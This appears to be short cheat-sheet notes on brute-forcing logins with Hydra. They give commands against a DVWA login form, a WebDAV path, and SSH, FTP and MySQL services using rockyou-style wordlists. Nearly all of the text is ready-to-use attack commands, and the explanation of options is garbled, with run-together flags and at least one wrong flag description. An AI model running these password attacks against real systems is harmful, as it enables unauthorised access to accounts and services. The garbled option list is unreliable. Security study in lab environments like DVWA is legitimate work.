
To launch password attacks in forms using http-post-form and injecting the variables like ^USER^. The data in the request can be obtained using Chrome dev tools or Burpsuite.
hydra -l admin -P /usr/share/jonh/password.lst 10.0.2.6 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&login=Login:Login failed" -f
The options are:
-u username-L user list-p password-P passwordList-f exit at the first successful result server, where to attack servicet number of threads to run in parallelhttp-post-form service.Another example with http-get
hydra -l admin -P pass.txt $TARGET http-get /webdav
We use the ssh service.
hydra -l root -P /usr/share/wordlists/rockyou.txt.gz $TARGET ssh
hydra -t 4 -l Mike -P /usr/share/wordlists/rockyou.txt -vV $TARGET ftp
hydra -t 4 -l root -P /usr/share/wordlists/rockyou.txt $TARGET mysql